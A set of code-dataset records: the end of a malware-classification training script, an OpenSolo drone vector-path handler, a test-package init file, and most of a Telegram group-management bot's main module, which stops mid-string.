if load!=\"\":\n _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n return model\n\n\ndef gnn_model(load=\"\"):\n model = GNN_MAL(config.num_classes)\n if load!=\"\":\n _, ckpt_manager = load_ckpt(model, config.model_save_path+load+'/')\n return model\n\nfn = tf.keras.metrics.FalseNegatives()\nfp = tf.keras.metrics.FalsePositives()\ntn = tf.keras.metrics.TrueNegatives()\ntp = tf.keras.metrics.TruePositives()\nacc = tf.keras.metrics.Accuracy() \nrecall = tf.keras.metrics.Recall()\ndef metrics(y_true, y_pred):\n print(fn(y_true, y_pred),fp(y_true, y_pred),tn(y_true, y_pred),tp(y_true, y_pred) ,recall(y_true, y_pred), acc(y_true, y_pred))\n fp.reset_states()\n fn.reset_states()\n tp.reset_states()\n tn.reset_states()\n acc.reset_states()\n recall.reset_states()\n\ndef train(name):\n if name == 'cnn':\n train_ds, val_ds = prepare_data_image()\n model = cnn_model()\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n train_ds, val_ds = prepare_data_txt()\n model = rnn_model(name)\n elif name == 'gnn':\n train_ds, val_ds = prepare_data_graph()\n model = gnn_model()\n \n _, ckpt_manager = load_ckpt(model, config.model_save_path+name+'/')\n _max_acc = 0.90\n if name == 'gnn':\n for _ in range(config.epochs):\n gnn_train(model, train_ds)\n y_true, y_pred = gnn_test(model, val_ds)\n metrics(y_true, y_pred)\n ckpt_manager.save()\n else:\n for i in range(config.epochs):\n print('===========\\n',i)\n history = model.fit(\n train_ds,\n validation_data=val_ds,\n batch_size=config.batch_size,\n #steps_per_epoch=config.train_size/config.batch_size,\n epochs=5#config.epochs\n ) \n if history.history['val_accuracy'][0] > _max_acc:\n _max_acc = history.history['val_accuracy'][0] \n ckpt_manager.save() \n\ndef evaluation(name):\n if name == 'cnn':\n _, val_ds = prepare_data_image()\n model = cnn_model(name)\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n _, val_ds = prepare_data_txt()\n model = rnn_model(name,name)\n elif name == 'gnn':\n _, val_ds = prepare_data_graph()\n model = gnn_model(name)\n\n \n if name == 'gnn':\n y_true, y_pred = gnn_test(model, val_ds)\n metrics(y_true, y_pred)\n elif name == 'lstm' or name == 'gru' or name == 'rnn':\n y_pred = model.predict(val_ds)\n y_pred = tf.reshape(tf.argmax(y_pred, axis=1), shape=(-1))\n y_true = val_ds.get_labels()\n y_true=tf.concat(y_true, 0)\n metrics(y_true, y_pred)\n else:\n y_pred = model.predict(val_ds)\n model.save(config.model_save_path+name+\"/single.model\")\n y_pred = tf.reshape(tf.argmax(y_pred, axis=1), shape=(-1))\n y_true = []\n for element in val_ds.as_numpy_iterator(): \n y_true.append(element[1]) \n y_true=tf.concat(y_true, 0)\n metrics(y_true, y_pred)\n\ndef load_ckpt(model, path, newest=True):\n ckpt = tf.train.Checkpoint(transformer=model)\n ckpt_manager = tf.train.CheckpointManager(ckpt, path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n if newest == True:\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print ('Latest checkpoint restored!!', path, newest, ckpt_manager.latest_checkpoint)\n else:\n ckpt.restore(path+newest)\n print ('checkpoint restored!!', path, newest)\n return ckpt, ckpt_manager\n\nif __name__ == '__main__':\n train('cnn')\n train('rnn')\n train('gnn')\n evaluation('cnn')\n","repo_name":"PSUCyberSecurityLab/AIforCybersecurity","sub_path":"Chapter6-Malware-Classification/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"47"} 
+{"seq_id":"5939297817","text":"#\n# Code common across shots to handle movement on paths\n#\nfrom pymavlink import mavutil\nimport location_helpers\nimport shotLogger\nfrom pathHandler import PathHandler\nfrom shotManagerConstants import *\nimport math\nfrom vector3 import Vector3\n\nlogger = shotLogger.logger\n\n#Path accel/decel constants\nWPNAV_ACCEL = 200\nWPNAV_ACCEL_Z = 160\n\n# for 3D max speed\nHIGH_PATH_SPEED = 5.0\nLOW_PATH_SPEED = 1.5\nMAX_PATH_SPEED = HIGH_PATH_SPEED + LOW_PATH_SPEED \n\n# used to correct for drag or other factors\nERROR_P = .01\n\n# special case of PathHandler\nclass VectorPathHandler(PathHandler):\n def __init__(self, vehicle, shotManager, heading, pitch):\n PathHandler.__init__(self, vehicle, shotManager)\n\n # the initial reference position\n self.initialLocation = vehicle.location.global_relative_frame\n self.heading = heading\n\n # creates a unit vector from telemetry data\n self.unitVector = self.getUnitVectorFromHeadingAndTilt(heading, pitch)\n \n # limit speed based on vertical component\n # We can't go full speed vertically\n # this section should be 2.0 to 8.0 m/s\n # to generate a nice speed limiting curve we scale it.\n # pitch is used to generate the vertical portion of the 3d Vector\n\n pitch = min(pitch, 0) # level\n pitch = max(pitch, -90) # down\n accelXY = shotManager.getParam( \"WPNAV_ACCEL\", WPNAV_ACCEL ) / 100.0\n accelZ = shotManager.getParam( \"WPNAV_ACCEL_Z\", WPNAV_ACCEL_Z ) / 100.0\n\n cos_pitch = math.cos(math.radians(pitch))\n \n self.maxSpeed = LOW_PATH_SPEED + (cos_pitch**3 * HIGH_PATH_SPEED)\n self.maxSpeed = min(self.maxSpeed, MAX_PATH_SPEED)\n self.accel = accelZ + (cos_pitch**3 * (accelXY - accelZ)) \n self.accel *= UPDATE_TIME\n\n # the current distance from the intitial location\n self.distance = 0.0\n\n #for synthetic acceleration\n self.currentSpeed = 0.0\n self.desiredSpeed = 0.0\n self.distError = 0.0\n\n # given RC input, calculate a speed to move along vector\n def move(self, channels):\n\n # allows travel along the vector\n # use the max of them\n if abs(channels[ROLL]) > abs(channels[PITCH]):\n userInput = channels[ROLL]\n else:\n userInput = -channels[PITCH]\n\n # user controls speed\n if self.cruiseSpeed == 0.0:\n self.desiredSpeed = userInput * self.maxSpeed\n\n # cruise control\n else:\n speed = abs(self.cruiseSpeed)\n # if sign of stick and cruiseSpeed don't match then...\n if math.copysign(1, userInput) != math.copysign(1, self.cruiseSpeed): # slow down\n speed *= (1.0 - abs(userInput))\n else: # speed up\n speed += (self.maxSpeed - speed) * abs(userInput)\n\n # carryover user input sign\n if self.cruiseSpeed < 0:\n speed = -speed\n\n # limit speed\n if speed > self.maxSpeed:\n speed = self.maxSpeed\n elif -speed > self.maxSpeed:\n speed = -self.maxSpeed\n\n self.desiredSpeed = speed\n \n # Synthetic acceleration\n if self.desiredSpeed > self.currentSpeed:\n self.currentSpeed += self.accel\n self.currentSpeed = min(self.currentSpeed, self.desiredSpeed)\n elif self.desiredSpeed < self.currentSpeed:\n self.currentSpeed -= self.accel\n self.currentSpeed = max(self.currentSpeed, self.desiredSpeed)\n else:\n self.currentSpeed = self.desiredSpeed\n\n\n # the distance to fly along the vectorPath\n self.distance += self.currentSpeed * UPDATE_TIME\n self.distance += self.distError * ERROR_P\n\n # generate Guided mode commands to move the copter\n self.travel()\n\n # report speed output\n return abs(self.currentSpeed)\n\n\n def travel(self):\n ''' generate a new location from our distance offset and initial position 
'''\n \n # the location of the vehicle in meters from the origin\n offsetVector = self.unitVector * self.distance\n\n # Scale unit vector by speed\n velVector = self.unitVector * self.currentSpeed\n\n # Convert NEU to NED velocity\n #velVector.z = -velVector.z\n\n # generate a new Location from our offset vector and initial location\n loc = location_helpers.addVectorToLocation(self.initialLocation, offsetVector)\n\n # calc dot product so we can assign a sign to the distance\n vectorToTarget = location_helpers.getVectorFromPoints( self.initialLocation, self.vehicle.location.global_relative_frame)\n dp = self.unitVector.x * vectorToTarget.x\n dp += self.unitVector.y * vectorToTarget.y\n dp += self.unitVector.z * vectorToTarget.z\n \n self.actualDistance = location_helpers.getDistanceFromPoints3d(self.initialLocation, self.vehicle.location.global_relative_frame)\n\n if (dp < 0):\n self.actualDistance = -self.actualDistance\n\n # We can now compare the actual vs vector distance\n self.distError = self.actualDistance - self.distance\n \n # formulate mavlink message for pos-vel controller\n posVelMsg = self.vehicle.message_factory.set_position_target_global_int_encode(\n 0, # time_boot_ms (not used)\n 0, 1, # target system, target component\n mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, # frame\n 0b0000110111000000, # type_mask - enable pos/vel\n int(loc.lat * 10000000), # latitude (degrees*1.0e7)\n int(loc.lon * 10000000), # longitude (degrees*1.0e7)\n loc.alt, # altitude (meters)\n velVector.x, velVector.y, velVector.z, # North, East, Down velocity (m/s)\n 0, 0, 0, # x, y, z acceleration (not used)\n 0, 0) # yaw, yaw_rate (not used)\n\n # send pos-vel command to vehicle\n self.vehicle.send_mavlink(posVelMsg)\n\n\n def getUnitVectorFromHeadingAndTilt(self, heading, tilt):\n ''' generate a vector from the camera gimbal '''\n angle = math.radians(90 - heading)\n tilt = math.radians(tilt)\n \n # create a vector scaled by tilt\n x = math.cos(tilt)\n \n # Rotate the vector\n nx = x * math.cos(angle)\n ny = x * math.sin(angle)\n\n # Up\n z = math.sin(tilt)\n \n return Vector3(ny, nx, z)\n\n","repo_name":"OpenSolo/OpenSolo","sub_path":"shotmanager/vectorPathHandler.py","file_name":"vectorPathHandler.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"47"} +{"seq_id":"75140996941","text":"# pylint: disable=wrong-import-position\n\nAPP_NAME = \"resource_management\"\nOPERATION_NAME = \"get_authorized_users_for_item\"\nREQUEST_METHOD = \"get\"\nURL_SUFFIX = \"get/item/users/\"\n\nfrom .test_case_01 import TestCase01GetAuthorizedUsersForItemAPITestCase\n\n__all__ = [\n \"TestCase01GetAuthorizedUsersForItemAPITestCase\"\n]\n","repo_name":"bammidichandini/resource_management-chandini","sub_path":"resource_management/views/get_authorized_users_for_item/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33793118016","text":"import importlib\nimport re\nimport sys\nimport time\nimport datetime\nfrom sys import argv\nfrom typing import Optional, List\n\nfrom pyrogram import filters\nfrom telegram import (\n Chat,\n InlineKeyboardButton,\n InlineKeyboardMarkup,\n ReplyKeyboardMarkup,\n KeyboardButton,\n Message,\n ParseMode,\n Update,\n User,\n Bot,\n)\nfrom telegram.error import (\n BadRequest,\n ChatMigrated,\n NetworkError,\n TelegramError,\n TimedOut,\n Unauthorized,\n)\nfrom 
telegram.ext import (\n    CallbackContext,\n    CallbackQueryHandler,\n    CommandHandler,\n    Filters,\n    MessageHandler,\n)\nfrom telegram.ext.dispatcher import run_async, DispatcherHandlerStop, Dispatcher\nfrom telegram.utils.helpers import escape_markdown\n\nfrom aries import (\n    ALLOW_EXCL,\n    BL_CHATS,\n    CERT_PATH,\n    DONATION_LINK,\n    LOGGER,\n    PORT,\n    SUPPORT_CHAT,\n    TOKEN,\n    URL,\n    WEBHOOK,\n    WHITELIST_CHATS,\n    StartTime,\n    dispatcher,\n    pbot,\n    telethn,\n    ubot,\n    updater,\n)\n\n# needed to dynamically load modules\n# NOTE: Module order is not guaranteed, specify that in the config file!\nfrom aries.modules import ALL_MODULES\nfrom aries.modules.helper_funcs.alternate import typing_action\nfrom aries.modules.helper_funcs.chat_status import is_user_admin\nfrom aries.modules.helper_funcs.misc import paginate_modules\nfrom aries.modules.helper_funcs.readable_time import get_readable_time\nfrom aries.modules.sql import users_sql as sql\n\nHELP_MSG = \"Click The Button Below To Get Help Menu In Your Private Message.\"\nHELP_IMG = \"https://telegra.ph/file/ac893610cae84f302b2da.jpg\"\nGROUP_START_IMG = (\n    \"CAACAgIAAx0CXBdkHQAC34lhpHKAV3nIlqfcnYmDkIhbOFTktwACFBAAAkXe2EuBs3crQ6mMdR4E\"\n)\n\nPM_START_TEXT = \"\"\"\nHello there, [👋](https://telegra.ph/file/ac893610cae84f302b2da.jpg) I'm {}.\nI'm A Powerful Management Bot And I Will Help In Managing Your Group.\nMaintained by : [Aryza](https://t.me/idzxartez)\nFounder And Dev Of : [IDZEROID SYNDICATES](https://t.me/idzeroidsupport).\n➖➖➖➖➖➖➖➖➖➖➖➖➖\n• *Uptime:* `{}`\n• `{}` *Users, across* `{}` *chats.*\n➖➖➖➖➖➖➖➖➖➖➖➖➖\nMade specifically to manage your group, I specialize in managing Entertainment and all other types of groups and channels.\n✪ Make sure you read the *DETAILS* Section Below ✪ \n\"\"\"\n\nbuttons = [\n    [\n        InlineKeyboardButton(text=\" 「 Details 」\", callback_data=\"aboutmanu_\"),\n        InlineKeyboardButton(text=\" 「 Inline 」\", switch_inline_query_current_chat=\"\"),\n    ],\n    [\n        InlineKeyboardButton(\n            text=\" ➕ 「 Summon Me 」➕ \",\n            url=\"t.me/idzeroid_bot?startgroup=true\",\n        ),\n    ],\n    [\n        InlineKeyboardButton(text=\" 「 Support 」\", url=\"http://t.me/idzeroidsupport\"),\n        InlineKeyboardButton(text=\" [❌] \", callback_data=\"close\"),\n        InlineKeyboardButton(text=\" 「 Update 」\", url=\"http://t.me/idzeroid\"),\n    ],\n]\n\n\nHELP_STRINGS = f\"\"\"\n*Main Commands :* [Saint Aries](https://telegra.ph/file/ac893610cae84f302b2da.jpg)\n✪ /start: Starts me! You've probably already used this.\n✪ /help: Click this, I'll let you know about myself!\n✪ /donate: You can support my creator using this command.\n✪ /settings: \n  ◔ in PM: will send you your settings for all supported modules.\n  ◔ in a Group: will redirect you to pm, with all that chat's settings.\n\"\"\".format(\n    dispatcher.bot.first_name,\n    \"\" if not ALLOW_EXCL else \"\\nAll commands can either be used with / or !.\\n\",\n)\n\n\nDONATE_STRING = \"\"\"Hello, glad to hear you want to donate!\n You can support the project via [pulsa](#) or by contacting @IdzXartez\\\n Supporting isn't always financial! 
\\\n Those who cannot provide monetary support are welcome to help us develop the bot at .\"\"\"\n\nIMPORTED = {}\nMIGRATEABLE = []\nHELPABLE = {}\nSTATS = []\nUSER_INFO = []\nUSER_BOOK = []\nDATA_IMPORT = []\nDATA_EXPORT = []\n\nCHAT_SETTINGS = {}\nUSER_SETTINGS = {}\n\nGDPR = []\n\nfor module_name in ALL_MODULES:\n imported_module = importlib.import_module(\"aries.modules.\" + module_name)\n if not hasattr(imported_module, \"__mod_name__\"):\n imported_module.__mod_name__ = imported_module.__name__\n\n if not imported_module.__mod_name__.lower() in IMPORTED:\n IMPORTED[imported_module.__mod_name__.lower()] = imported_module\n else:\n raise Exception(\"Can't have two modules with the same name! Please change one\")\n\n if hasattr(imported_module, \"__help__\") and imported_module.__help__:\n HELPABLE[imported_module.__mod_name__.lower()] = imported_module\n\n if hasattr(imported_module, \"get_help\") and imported_module.get_help:\n HELPABLE[imported_module.__mod_name__.lower()] = imported_module\n\n # Chats to migrate on chat_migrated events\n if hasattr(imported_module, \"__migrate__\"):\n MIGRATEABLE.append(imported_module)\n\n if hasattr(imported_module, \"__stats__\"):\n STATS.append(imported_module)\n\n if hasattr(imported_module, \"__gdpr__\"):\n GDPR.append(imported_module)\n\n if hasattr(imported_module, \"__user_info__\"):\n USER_INFO.append(imported_module)\n\n if hasattr(imported_module, \"__user_book__\"):\n USER_BOOK.append(imported_module)\n\n if hasattr(imported_module, \"__import_data__\"):\n DATA_IMPORT.append(imported_module)\n\n if hasattr(imported_module, \"__export_data__\"):\n DATA_EXPORT.append(imported_module)\n\n if hasattr(imported_module, \"__chat_settings__\"):\n CHAT_SETTINGS[imported_module.__mod_name__.lower()] = imported_module\n\n if hasattr(imported_module, \"__user_settings__\"):\n USER_SETTINGS[imported_module.__mod_name__.lower()] = imported_module\n\n\n# do not async\ndef send_help(chat_id, text, keyboard=None):\n if not keyboard:\n keyboard = InlineKeyboardMarkup(paginate_modules(0, HELPABLE, \"help\"))\n dispatcher.bot.send_message(\n chat_id=chat_id, text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard\n )\n\n\ndef test(update, context):\n try:\n print(update)\n except:\n pass\n update.effective_message.reply_text(\n \"Hola tester! 
_I_ *have* `markdown`\", parse_mode=ParseMode.MARKDOWN\n )\n update.effective_message.reply_text(\"This person edited a message\")\n print(update.effective_message)\n\n\ndef start(update: Update, context: CallbackContext):\n args = context.args\n message = update.effective_message\n uptime = get_readable_time((time.time() - StartTime))\n if update.effective_chat.type == \"private\":\n if len(args) >= 1:\n if args[0].lower() == \"help\":\n send_help(update.effective_chat.id, HELP_STRINGS)\n elif args[0].lower().startswith(\"ghelp_\"):\n mod = args[0].lower().split(\"_\", 1)[1]\n if not HELPABLE.get(mod, False):\n return\n send_help(\n update.effective_chat.id,\n HELPABLE[mod].__help__,\n InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"⬅️ BACK\", callback_data=\"help_back\"\n )\n ]\n ]\n ),\n )\n elif args[0].lower() == \"markdownhelp\":\n IMPORTED[\"extras\"].markdown_help_sender(update)\n elif args[0].lower().startswith(\"stngs_\"):\n match = re.match(\"stngs_(.*)\", args[0].lower())\n chat = dispatcher.bot.getChat(match.group(1))\n\n if is_user_admin(chat, update.effective_user.id):\n send_settings(match.group(1), update.effective_user.id, False)\n else:\n send_settings(match.group(1), update.effective_user.id, True)\n\n elif args[0][1:].isdigit() and \"rules\" in IMPORTED:\n IMPORTED[\"rules\"].send_rules(update, args[0], from_pm=True)\n\n else:\n message.reply_text(\n PM_START_TEXT.format(\n escape_markdown(context.bot.first_name),\n escape_markdown(uptime),\n sql.num_users(),\n sql.num_chats(),\n ),\n reply_markup=InlineKeyboardMarkup(buttons),\n parse_mode=ParseMode.MARKDOWN,\n timeout=60,\n )\n else:\n message.reply_animation(\n GROUP_START_IMG,\n caption=\" Aries Online \\nI am Awake Since: {}\".format(\n uptime\n ),\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Support\", url=f\"https://telegram.dog/idzeroidsupport\"\n ),\n InlineKeyboardButton(\n text=\"Updates\", url=\"https://telegram.dog/idzeroid\"\n ),\n ],\n ]\n ),\n )\n\n\n# for test purposes\ndef error_callback(update: Update, context: CallbackContext):\n error = context.error\n try:\n raise error\n except Unauthorized:\n print(\"no nono1\")\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(\"no nono2\")\n print(\"BadRequest caught\")\n print(error)\n\n # handle malformed requests - read more below!\n except TimedOut:\n print(\"no nono3\")\n # handle slow connection problems\n except NetworkError:\n print(\"no nono4\")\n # handle other connection problems\n except ChatMigrated as err:\n print(\"no nono5\")\n print(err)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef help_button(update, context):\n query = update.callback_query\n mod_match = re.match(r\"help_module\\((.+?)\\)\", query.data)\n prev_match = re.match(r\"help_prev\\((.+?)\\)\", query.data)\n next_match = re.match(r\"help_next\\((.+?)\\)\", query.data)\n back_match = re.match(r\"help_back\", query.data)\n try:\n if mod_match:\n module = mod_match.group(1)\n text = (\n \"* 「 Help for {} module 」*\\n\".format(HELPABLE[module].__mod_name__)\n + HELPABLE[module].__help__\n )\n query.message.edit_text(\n text=text,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Back\", callback_data=\"help_back\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Support\", 
url=\"https://t.me/idzeroidsupport\"\n ),\n ],\n ]\n ),\n )\n elif prev_match:\n curr_page = int(prev_match.group(1))\n query.message.edit_text(\n HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(curr_page - 1, HELPABLE, \"help\")\n ),\n )\n\n elif next_match:\n next_page = int(next_match.group(1))\n query.message.edit_text(\n HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(next_page + 1, HELPABLE, \"help\")\n ),\n )\n\n elif back_match:\n query.message.edit_text(\n text=HELP_STRINGS,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n paginate_modules(0, HELPABLE, \"help\")\n ),\n )\n\n # ensure no spinny white circle\n context.bot.answer_callback_query(query.id)\n # query.message.delete()\n except Exception as excp:\n if excp.message == \"Message is not modified\":\n pass\n elif excp.message == \"Query_id_invalid\":\n pass\n elif excp.message == \"Message can't be deleted\":\n pass\n else:\n query.message.edit_text(excp.message)\n LOGGER.exception(\"Exception in help buttons. %s\", str(query.data))\n\n\ndef aries_about_callback(update, context):\n query = update.callback_query\n if query.data == \"aboutmanu_\":\n query.message.edit_text(\n text=f\"*👋Hi again! The name's {dispatcher.bot.first_name} \\n\\nA powerful group management bot built to help you manage your group easily.* \"\n f\"\\n\\n 🔥 Join [Idzeroid Syndicates](https://t.me/idzeroidsupport) To Keep Yourself Updated About {dispatcher.bot.first_name} 🔥\"\n f\"\\n\\n I have the normal GROUP MANAGING functions like flood control, a warning system etc but I mainly have the advanced and handy Antispam system and the SIBYL banning system which safegaurds and helps your group from spammers.\"\n f\"\\n\\n ⚡️ 》 I can restrict users.\"\n f\"\\n\\n ⚡️ 》 I can greet users with customizable welcome messages and even set a group's rules.\"\n f\"\\n\\n ⚡️ 》 I have an advanced anti-flood system.\"\n f\"\\n\\n ⚡️ 》 I can warn users until they reach max warns, with each predefined actions such as ban, mute, kick, etc.\"\n f\"\\n\\n ⚡️ 》 I have a note keeping system, blacklists, and even predetermined replies on certain keywords.\"\n f\"\\n\\n ⚡️ 》 I check for admins' permissions before executing any command and more stuffs\"\n f\"\\n\\n If you have any question about *Aries*, let us know at @IdzeroidSupport.\"\n f\"\\n\\n👇 You Can Know More About *Aries* By Clicking The Below Buttons 👇\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"How To Use Me\", callback_data=\"aboutmanu_howto\"\n ),\n InlineKeyboardButton(\n text=\"T.A.C\", callback_data=\"aboutmanu_tac\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Help & Commands\", callback_data=\"help_back\"\n )\n ],\n [InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_back\")],\n ]\n ),\n )\n elif query.data == \"aboutmanu_back\":\n query.message.edit_text(\n PM_START_TEXT.format(\n escape_markdown(context.bot.first_name),\n escape_markdown(get_readable_time((time.time() - StartTime))),\n sql.num_users(),\n sql.num_chats(),\n ),\n reply_markup=InlineKeyboardMarkup(buttons),\n parse_mode=ParseMode.MARKDOWN,\n timeout=60,\n )\n\n elif query.data == \"aboutmanu_howto\":\n query.message.edit_text(\n text=f\"* 「 BASIC HELP 」*\"\n f\"\\nIf You Can Also Add {dispatcher.bot.first_name} To Your Chats By Clicking [Here](http://t.me/{dispatcher.bot.username}?startgroup=true) 
And Selecting Chat. \\n\"\n f\"\\n\\nYou Can get support {dispatcher.bot.first_name} by joining [support](https://t.me/idzeroidsupport).\\n\"\n f\"\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Admins Settings\", callback_data=\"aboutmanu_permis\"\n ),\n InlineKeyboardButton(\n text=\"Anti Spam\", callback_data=\"aboutmanu_spamprot\"\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"Music Setup\", callback_data=\"aboutmanu_cbguide\"\n ),\n ],\n [InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_\")],\n ]\n ),\n )\n elif query.data == \"aboutmanu_credit\":\n query.message.edit_text(\n text=f\"*Aries Is the redisigned version of Daisy and Saitama And Othrer for the best performance.*\"\n f\"\\n\\nAries source code was rewritten by @IdzXartez and All Of Conrtibutor For Help Aries\"\n f\"\\n\\nIf Any Question About aries, \\nLet Us Know At @Idzeroidsupport.\",\n parse_mode=ParseMode.MARKDOWN,\n disable_web_page_preview=True,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_tac\")]]\n ),\n )\n\n elif query.data == \"aboutmanu_permis\":\n query.message.edit_text(\n text=f\" 「 Admin Permissions 」\"\n f\"\\nTo avoid slowing down, {dispatcher.bot.first_name} caches admin rights for each user. This cache lasts about 10 minutes; this may change in the future. This means that if you promote a user manually (without using the /promote command), {dispatcher.bot.first_name} will only find out ~10 minutes later.\"\n f\"\\n\\nIF you want to update them immediately, you can use the /admincache command,thta'll force {dispatcher.bot.first_name} to check who the admins are again and their permissions\"\n f\"\\n\\nIf you are getting a message saying:\"\n f\"\\nYou must be this chat administrator to perform this action!\"\n f\"\\nThis has nothing to do with {dispatcher.bot.first_name}'s rights; this is all about YOUR permissions as an admin. {dispatcher.bot.first_name} respects admin permissions; if you do not have the Ban Users permission as a telegram admin, you won't be able to ban users with {dispatcher.bot.first_name}. Similarly, to change {dispatcher.bot.first_name} settings, you need to have the Change group info permission.\"\n f\"\\n\\nThe message very clearly says that you need these rights - not {dispatcher.bot.first_name}.\",\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_howto\")]]\n ),\n )\n elif query.data == \"aboutmanu_spamprot\":\n query.message.edit_text(\n text=\"* 「 Anti-Spam Settings 」*\"\n \"\\n- /antispam : Change antispam security settings in the group, or return your current settings(when no arguments).\"\n \"\\n_This helps protect you and your groups by removing spam flooders as quickly as possible._\"\n \"\\n\\n- /setflood : enables or disables flood control\"\n \"\\n- /setfloodmode : Action to perform when user have exceeded flood limit. ban/kick/mute/tmute/tban\"\n \"\\n_Antiflood allows you to take action on users that send more than x messages in a row. Exceeding the set flood will result in restricting that user._\"\n \"\\n\\n- /addblacklist : Add a trigger to the blacklist. 
Each line is considered one trigger, so using different lines will allow you to add multiple triggers.\"\n \"\\n- /blacklistmode : Action to perform when someone sends blacklisted words.\"\n \"\\n_Blacklists are used to stop certain triggers from being said in a group. Any time the trigger is mentioned, the message will immediately be deleted. A good combo is sometimes to pair this up with warn filters!_\"\n \"\\n\\n- /reports : Change report setting, or view current status.\"\n \"\\n • If done in pm, toggles your status.\"\n \"\\n • If in chat, toggles that chat's status.\"\n \"\\n_If someone in your group thinks someone needs reporting, they now have an easy way to call all admins._\"\n \"\\n\\n- /lock : Lock items of a certain type (not available in private)\"\n \"\\n- /locktypes: Lists all possible locktypes\"\n \"\\n_The locks module allows you to lock away some common items in the telegram world; the bot will automatically delete them!_\"\n '\\n\\n- /addwarn : Sets a warning filter on a certain keyword. If you want your keyword to be a sentence, encompass it with quotes, as such: /addwarn \"very angry\" This is an angry user. '\n \"\\n- /warn : Warns a user. After 3 warns, the user will be banned from the group. Can also be used as a reply.\"\n \"\\n- /strongwarn : If set to on, exceeding the warn limit will result in a ban. Else, will just kick.\"\n \"\\n_If you're looking for a way to automatically warn users when they say certain things, use the /addwarn command._\"\n \"\\n\\n- /welcomemute : All users that join, get muted\"\n \"\\n_ A button gets added to the welcome message for them to unmute themselves. This proves they aren't a bot! soft - restricts users ability to post media for 24 hours. strong - mutes on join until they prove they're not bots._\",\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_howto\")]]\n ),\n )\n elif query.data == \"aboutmanu_tac\":\n query.message.edit_text(\n text=f\" 「 Terms and Conditions 」\\n\"\n f\"\\nTo Use This Bot, You Need To Read Terms and Conditions Carefully.\\n\"\n f\"\\n✪ We always respect your privacy \\n We never log into bot's api and spying on you \\n We use a encripted database \\n Bot will automatically stops if someone logged in with api.\"\n f\"\\n✪ Always try to keep credits, so \\n This hardwork is done by @IdzXartez spending many sleepless nights.. So, Respect it.\"\n f\"\\n✪ Some modules in this bot is owned by different authors, So, \\n All credits goes to them \\n Also for Paul Larson for Marie.\"\n f\"\\n✪ If you need to ask anything about \\n this bot, Go @Idzeroidsupport.\"\n f\"\\n✪ If you asking nonsense in Support \\n Chat, you will get warned/banned.\"\n f\"\\n✪ All api's we used owned by originnal authors \\n Some api's we use Free version \\n Please don't overuse AI Chat.\"\n f\"\\n\\nFor any kind of help, related to this bot, Join @idzeroidsupport.\"\n f\"\\n\\nTerms & Conditions will be changed anytime\\n\",\n parse_mode=ParseMode.HTML,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Credits\", callback_data=\"aboutmanu_credit\"\n ),\n InlineKeyboardButton(text=\"Back\", callback_data=\"aboutmanu_\"),\n ]\n ]\n ),\n )\n elif query.data == \"aboutmanu_cbguide\":\n query.message.edit_text(\n text=f\"* 「 How To Setup Music 」*\\n\"\n f\"\\n1. **first, add me to your group.\"\n f\"\\n2. **then promote me as admin and give all permissions except anonymous admin.\"\n f\"\\n3. 
